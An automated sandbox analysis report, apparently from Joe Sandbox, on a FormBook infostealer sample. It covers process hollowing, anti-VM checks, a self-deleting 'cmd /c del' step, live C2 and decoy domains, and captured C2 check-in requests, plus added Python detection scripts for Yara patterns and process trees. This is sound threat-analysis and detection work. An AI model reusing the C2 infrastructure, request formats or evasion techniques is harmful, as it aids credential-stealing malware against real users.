
Analysis Report 457b22da_by_Libranalysis

Overview

General Information

Sample Name:457b22da_by_Libranalysis (renamed file extension from none to exe)
Analysis ID:412121
MD5:457b22da77d4db093a31dd80a4b8963f
SHA1:83dc32633108d309f6b6b50a42dc102e7375f54c
SHA256:8dc4c1a88f19df4a3731991e632688147b6132bcb6cffa2dfbef8ee081c6ddae

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
PE file has nameless sections
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 457b22da_by_Libranalysis.exe (PID: 4120 cmdline: 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe' MD5: 457B22DA77D4DB093A31DD80A4B8963F)
    • 457b22da_by_Libranalysis.exe (PID: 5452 cmdline: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe MD5: 457B22DA77D4DB093A31DD80A4B8963F)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 852 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 5448 cmdline: /c del 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rogegalmish.com/a8si/"], "decoy": ["mosquitocontrolpro.com", "omfgphil.com", "qqkit.net", "compusolutionsac.com", "skynetaccess.com", "helmetmoto.com", "webdomoupravitel.com", "thepocket-onlinelesson.xyz", "stefaniehirsch.space", "goalsandballs.com", "xn--bro-ba-3ya.com", "tomrings.com", "4520oceanviewavenue.com", "mamaebemorientada.com", "shopwreathrails.com", "restaurantestancia.com", "annaquatics.info", "mnarchitect.design", "best-cleaner.com", "jobhuizhan.com", "check-info-bank.network", "boostcoachingonline.com", "basimogroup.com", "076fb5.com", "conansr.icu", "numbereightturquoise.com", "southernbrushworks.com", "home-inland.com", "irrpa.com", "ethereumdailypay.com", "betsysellsswfl.com", "cutebyconstance.website", "modelsnt.com", "medifilt.com", "tracisolomon.xyz", "dchaulingdisposal.com", "minchenhy.com", "smart4earth.com", "rackembilliards.com", "benschiller-coaching.com", "virtualroasters.com", "applewholesales.com", "thesidspot.com", "grechenblogs.com", "marshlandlogisticsservices.net", "covidokotoks.com", "mirabilla.com", "hunab.tech", "foreverjsdesigns.com", "heipacc.info", "simon-schilling.com", "shirleyeluiz.com", "juguetibicicollectors.com", "70shousemanchester.com", "tranthaolinh.net", "urbanpokebar.com", "madras-spice.com", "fulmardelta.net", "drisu-goalkeeping.com", "jiotest.com", "vitatiensa.com", "melbournebusinesslawyers.net", "rajehomes.com", "company-for-you.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
[18 further memory-dump matches not shown]

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.457b22da_by_Libranalysis.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.457b22da_by_Libranalysis.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.457b22da_by_Libranalysis.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
[1 further unpacked-PE match not shown]
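The two community rules above match raw byte sequences, not strings, and the offsets listed are where those sequences sit in each dump. As an added example (not part of this report and not the rule authors' tooling), the Python below scans a constructed buffer for the byte patterns quoted above and explains what they are. Each JPCERT/CC string is a 5-byte `push imm32` (opcode 0x68 followed by a little-endian immediate); that the immediate is the hash FormBook pushes to resolve `sqlite3_step`, `sqlite3_column_text` and `sqlite3_column_blob` by name is inferred from the rule's string names and is an assumption here. `$sequence_0` decodes as `add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax`, the RDTSC timing probe the signature list reports. The buffer SAMPLE is constructed, not a dump from the sample.

```python
import re

# Byte patterns copied from the rule hits listed in this report (JPCERT/CC
# "Formbook" strings and two of the yara-signator "Formbook_1" sequences).
PATTERNS = {
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
    "$sequence_0":  "03 C8 0F 31 2B C1 89 45 FC",
    "$sequence_8":  "3C 54 74 04 3C 74 75 F4",
}


def hex_to_bytes(hexstr):
    """'68 34 1C 7B E1' -> b'\\x68\\x34\\x1c\\x7b\\xe1'."""
    return bytes.fromhex(hexstr.replace(" ", ""))


def scan(buf, patterns=PATTERNS):
    """Every (name, offset) hit in buf, lowest offset first, like yara's string hits."""
    hits = []
    for name, hexstr in patterns.items():
        needle = re.escape(hex_to_bytes(hexstr))
        hits.extend((name, m.start()) for m in re.finditer(needle, buf))
    return sorted(hits, key=lambda h: (h[1], h[0]))


def decode_push_imm32(buf, off):
    """The 32-bit immediate if buf[off] starts a 'push imm32' (opcode 0x68), else None."""
    if off + 5 > len(buf) or buf[off] != 0x68:
        return None
    return int.from_bytes(buf[off + 1:off + 5], "little")


def annotate(buf, patterns=PATTERNS):
    """Attach a human-readable note to each hit."""
    out = []
    for name, off in scan(buf, patterns):
        imm = decode_push_imm32(buf, off)
        if imm is not None:
            # Assumption: the immediate is the API-name hash FormBook pushes before
            # its resolver call; the rule's string name says which API it stands for.
            note = "push 0x%08X (hashed API name, %s)" % (imm, name.lstrip("$"))
        elif b"\x0f\x31" in hex_to_bytes(patterns[name]):
            note = "contains rdtsc: timing probe (anti-VM / anti-debug)"
        else:
            note = "code sequence"
        out.append({"name": name, "offset": off, "note": note})
    return out


# Constructed test buffer: filler bytes with three of the patterns embedded at
# known offsets (16, 28 and 42). Not a real memory dump from the sample.
SAMPLE = (b"\x90" * 16
          + hex_to_bytes(PATTERNS["$sqlite3step"]) + b"\xcc" * 7
          + hex_to_bytes(PATTERNS["$sequence_0"]) + b"\x00" * 5
          + hex_to_bytes(PATTERNS["$sqlite3blob"]))

if __name__ == "__main__":
    for hit in annotate(SAMPLE):
        print("0x%x %-13s %s" % (hit["offset"], hit["name"], hit["note"]))
```

Pointing `annotate()` at a real dump (for instance the `.sdmp` files this report lists) would print the same kind of hit table; the value of the exercise is that once a hit is located, the five bytes tell you whether you are looking at an API-hash push or at the timing check, which decides what to set a breakpoint on next.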

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Source: Process started
Author: Oleg Kolesnikov @securonix invrep_de, oscd.community
Data:
    Command: C:\Windows\SysWOW64\rundll32.exe
    CommandLine: C:\Windows\SysWOW64\rundll32.exe
    CommandLine|base64offset|contains: (empty)
    Image: C:\Windows\SysWOW64\rundll32.exe
    NewProcessName: C:\Windows\SysWOW64\rundll32.exe
    OriginalFileName: C:\Windows\SysWOW64\rundll32.exe
    ParentCommandLine: (empty)
    ParentImage: C:\Windows\explorer.exe
    ParentProcessId: 3388
    ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe
    ProcessId: 852
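The Sigma hit and the `cmd.exe /c del` step in the Startup tree are the two host-side behaviours worth turning into tested detection logic: a LOLBin started with no arguments at all (rundll32.exe here is only a hollowed container for the injected FormBook code), and the injected code deleting the original dropper. The Python below is an added example, not the Sigma rule's own logic nor the report's code. It replays the Startup tree as constructed process-creation records and flags both behaviours. The entries in SACRIFICIAL other than rundll32.exe are an assumption about which other binaries are meaningless without arguments; explorer.exe is given no parent because the report draws it under the sample only because of injection.

```python
import re

# Constructed process-creation events modelled on the Startup tree of this report
# (pid, parent pid, image path, command line). explorer.exe is drawn under the
# sample in the report because the sample injected into it, not because it
# spawned it, so its parent is left as 0 here.
SAMPLE_EXE = r"C:\Users\user\Desktop\457b22da_by_Libranalysis.exe"
EVENTS = [
    {"pid": 4120, "ppid": 0,    "image": SAMPLE_EXE, "cmdline": "'%s'" % SAMPLE_EXE},
    {"pid": 5452, "ppid": 4120, "image": SAMPLE_EXE, "cmdline": SAMPLE_EXE},
    {"pid": 3388, "ppid": 0,    "image": r"C:\Windows\explorer.exe", "cmdline": ""},
    {"pid": 852,  "ppid": 3388, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"C:\Windows\SysWOW64\rundll32.exe"},
    {"pid": 5448, "ppid": 852,  "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": "/c del '%s'" % SAMPLE_EXE},
    {"pid": 6084, "ppid": 5448, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# Binaries that do nothing useful without arguments. rundll32.exe is the case on
# this page; the others are assumed additions in the spirit of the Sigma rule.
SACRIFICIAL = {"rundll32.exe", "regsvr32.exe", "regasm.exe", "regsvcs.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def strip_quotes(s):
    return s.strip().strip("'\"").strip()


def has_no_arguments(ev):
    """True when the command line is nothing but the image (full path or bare name)."""
    cmd = strip_quotes(ev["cmdline"])
    if not cmd:
        return False  # no command line recorded, nothing to judge
    return cmd.lower() in (ev["image"].lower(), basename(ev["image"]))


def find_sacrificial(events):
    """PIDs of LOLBins started with no arguments at all (the Sigma 'Bad Opsec Defaults' case)."""
    return [ev["pid"] for ev in events
            if basename(ev["image"]) in SACRIFICIAL and has_no_arguments(ev)]


# "/c del [switches] <path>", path possibly quoted, case-insensitive like cmd.exe itself.
DEL_RE = re.compile(r"^\s*/c\s+del\s+(?:/\w\s+)*(.+?)\s*$", re.IGNORECASE)


def find_self_delete(events):
    """cmd.exe /c del <path> where <path> is the image of a process seen in the trace.
    The target is matched against every observed image rather than only cmd.exe's
    ancestors, because the hop through injected explorer.exe breaks the parent chain."""
    by_image = {}
    for ev in events:
        by_image.setdefault(ev["image"].lower(), []).append(ev["pid"])
    hits = []
    for ev in events:
        if basename(ev["image"]) != "cmd.exe":
            continue
        m = DEL_RE.match(ev["cmdline"])
        if not m:
            continue
        target = strip_quotes(m.group(1)).lower()
        if target in by_image:
            hits.append({"pid": ev["pid"], "parent": ev["ppid"], "target": target,
                         "target_pids": sorted(by_image[target])})
    return hits


if __name__ == "__main__":
    print("sacrificial processes:", find_sacrificial(EVENTS))
    for h in find_self_delete(EVENTS):
        print("self-delete: cmd.exe pid %d (parent %d) removes %s, the image of pids %s"
              % (h["pid"], h["parent"], h["target"], h["target_pids"]))
```

Either detection on its own is noisy on a busy host; together, in the same process tree and within seconds of each other, they are a strong post-injection signal, and the self-delete hit also tells the responder which file to pull from backups or VSS before it is gone.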

Signature Overview

AV Detection:

Found malware configuration
Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook (C2 list and decoy list as given under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: 457b22da_by_Libranalysis.exe, ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match, File source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: 457b22da_by_Libranalysis.exe, Joe Sandbox ML: detected
Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 457b22da_by_Libranalysis.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 457b22da_by_Libranalysis.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP, source: 457b22da_by_Libranalysis.exe, 00000004.00000003.235743424.0000000001750000.00000004.00000001.sdmp, rundll32.exe, 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb, source: 457b22da_by_Libranalysis.exe, rundll32.exe
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe, Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe, Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe, Code function: 4x nop then mov ecx, dword ptr [ebp-38h]
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe, Code function: 4x nop then mov ecx, dword ptr [ebp-38h]
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe, Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4x nop then pop ebx

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 34.95.69.141:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 34.95.69.141:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 34.95.69.141:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 156.252.96.189:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 156.252.96.189:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 156.252.96.189:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 184.168.131.241:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 184.168.131.241:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 184.168.131.241:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.rogegalmish.com/a8si/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe, DNS query: www.thepocket-onlinelesson.xyz
Source: C:\Windows\explorer.exe, DNS query: www.tracisolomon.xyz
Source: global traffic, HTTP traffic detected: GET /a8si/?NZb=u+x8HrW8TaP2OTySFAVUaGkyVI6Qrz7itxoztY99JgBPvqcvqvs4xGCSIVWMYkPxCa9b&2dND=GVTl- HTTP/1.1 | Host: www.skynetaccess.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /a8si/?NZb=AKlWb4FzuMtnty9OGtxovY3lKx8NV8ATEUFEzcIxGa/JytTKcc+qEWA3ceqFQyW9WUsw&2dND=GVTl- HTTP/1.1 | Host: www.thepocket-onlinelesson.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /a8si/?NZb=pM4A9y9s2fQOT6MseLZ6D1nJp3ZoXi1DIz8HREKs7lWKo2rCfk3YBCWk1LbwXjkHseQ/&2dND=GVTl- HTTP/1.1 | Host: www.shirleyeluiz.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /a8si/?NZb=ilDJZobCAoASZPKEjr+h2GJPzQZtXgxPn5qCqJ2imUF6WWwra1RdIaAgDcyp8aYyL3aO&2dND=GVTl- HTTP/1.1 | Host: www.drisu-goalkeeping.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /a8si/?NZb=+XN8NDZ1K2QCkRvOhUuLQIc57zcvFV8XafOJaWeGgjvpyrWV+MqtkcBEDSPdl300gZ3G&2dND=GVTl- HTTP/1.1 | Host: www.rogegalmish.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /a8si/?NZb=62/bSqqzpTDIfVncwf8kcLNbcalsRP0e0Vdwfvu8Ay8ZWoGvbHjczG9DeoieTYsPlzHS&2dND=GVTl- HTTP/1.1 | Host: www.best-cleaner.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /a8si/?NZb=O3o1U+q8oMW0A40QuM4kzZFzuvGZx18F2J1jOj0HsFueYiG3dIptHphoRZJy//fOFehA&2dND=GVTl- HTTP/1.1 | Host: www.4520oceanviewavenue.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /a8si/?NZb=jdN+3RUems8XgJANUws4WWtkbvXxMu2hTQ/t6K3f+t8prXi7JgWKk+q+WHlFohFhnqtz&2dND=GVTl- HTTP/1.1 | Host: www.omfgphil.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /a8si/?NZb=4F1bkU/AiPiMeDtr2vTtPD5XJl4c4IZLVeC3bIU2IShR3AvGXFCeCpQ25wAjwLp6N7J6&2dND=GVTl- HTTP/1.1 | Host: www.boostcoachingonline.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View, IP Address: 52.128.23.153
Source: Joe Sandbox View, ASN Name: DOSARRESTUS
Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View, ASN Name: VECTANTARTERIANetworksCorporationJP
Source: unknown, DNS traffic detected: queries for: www.skynetaccess.com
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 12 May 2021 10:25:46 GMT | Server: Apache/2.4.46 (Unix) | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp, String found in binary or memory: http://checkip.dyndns.org/
Source: explorer.exe, 00000005.00000000.263565575.000000000F540000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp, String found in binary or memory: http://servermanager.miixit.org/1
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp, String found in binary or memory: http://servermanager.miixit.org/downloads/
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp, String found in binary or memory: http://servermanager.miixit.org/hits/hit_index.php?k=
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp, String found in binary or memory: http://servermanager.miixit.org/index_ru.html
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp, String found in binary or memory: http://servermanager.miixit.org/index_ru.htmlc
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp, String found in binary or memory: http://servermanager.miixit.org/report/reporter_index.php?name=
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
